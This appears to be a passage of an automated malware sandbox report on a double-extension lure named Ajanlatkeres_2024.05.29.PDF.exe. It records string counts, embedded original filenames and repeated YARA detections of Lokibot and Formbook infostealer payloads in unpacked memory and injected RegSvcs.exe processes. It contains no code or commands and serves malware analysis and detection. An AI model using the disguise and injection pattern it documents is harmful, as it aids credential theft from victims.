            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F45130 appears 58 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F8F290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F57E54 appears 110 times
            Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1326006621.0000000004105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Ajanlatkeres_2024.05.29.PDF.exe
            Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1333822284.0000000007BE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Ajanlatkeres_2024.05.29.PDF.exe
            Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1324018301.0000000002F44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamejORR.exe0 vs Ajanlatkeres_2024.05.29.PDF.exe
            Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1330740673.0000000007200000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Ajanlatkeres_2024.05.29.PDF.exe
            Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1321124452.00000000010FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ajanlatkeres_2024.05.29.PDF.exe
            Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000000.1276409150.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEusz.exe0 vs Ajanlatkeres_2024.05.29.PDF.exe
            Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1324018301.0000000002E91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Ajanlatkeres_2024.05.29.PDF.exe
            Source: Ajanlatkeres_2024.05.29.PDF.exeBinary or memory string: OriginalFilenameEusz.exe0 vs Ajanlatkeres_2024.05.29.PDF.exe
            Source: Ajanlatkeres_2024.05.29.PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
